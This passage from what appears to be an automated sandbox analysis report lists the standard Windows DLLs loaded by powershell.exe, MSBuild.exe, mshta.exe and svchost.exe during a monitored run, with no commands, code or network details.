Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ieframe.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ieframe.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
